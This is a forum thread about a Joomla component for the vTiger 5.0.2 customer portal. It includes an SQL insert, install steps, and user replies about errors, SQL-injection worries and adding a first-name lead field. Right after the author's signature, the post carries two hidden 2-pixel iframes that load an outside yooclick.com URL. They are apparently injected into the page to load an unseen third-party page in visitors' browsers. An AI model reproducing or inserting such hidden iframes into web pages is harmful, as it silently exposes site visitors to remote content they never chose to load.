joomla component for vTiger customer portal 5.0.2

Attached is a component directory that works in Joomla. It didn't take long to create a vtportal mod and update the vtiger files...

You also need to add this to your joomla database:
INSERT INTO `jos_components` ( `id` , `name` , `link` , `menuid` , `parent` , `admin_menu_link` , `admin_menu_alt` , `option` , `ordering` , `admin_menu_img` , `iscore` , `params` )
VALUES (
NULL , 'vtportal', 'option=com_vtportal', '0', '0', '', '', 'com_vtportal', '0', '', '0', ''
);

Copy the com_vtportal to joomla's /components directory and add a menu item selecting the component com_vtportal. That's it.

A .zip install file will be available soon :)

Thanks,

Roy <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

  • 7 Comments sorted by Votes Date Added
  • great addition. do you have the project registered at the joomla! forge?
    i guess i will have to look for it.

    thanks.
  • i think that something has change in version 5.0.3 i am now getting this error. any ideas?

    fatal error: cannot redeclare timestamp_to_iso8601() (previously declared in /home/**/public_html/mambots/system/vt_classes/nusoap/lib/nusoap.php:586) in /home/**/public_html/components/com_vtportal/nusoap/lib/nusoap.php on line 606
  • what sort of additional security measures have people been implementing with this script. such as guarding against sql injection attacks and other malicious code hi-jacking. we have a dynamic query being built on web submissions right into a crm so....let's get the security discussion going
  • hey everyone. quick question. i am using this component to generate leads. however, the lead form does not have a space for "first name." i added it into the code, however i cannot get "first name" to correctly appear in vtiger. and when i mess with the $params array, it messing up the other data going in correctly. can someone explain to me how to add the ability to put the first name in the system? i am not familiar enough with soap to know how to do it. thanks!
  • you can get a simpel vtiger portal component for >= joomla 1.7 and vtigercrm 5.3.0 goto <!-- m --><a class="postlink" href="http://www.robusoft.us">http://www.robusoft.us</a><!-- m -->
  • looking for this functionality for vtiger 6.x & joomla 3.x - anyone still working on this integration?
Sign In or Register to comment.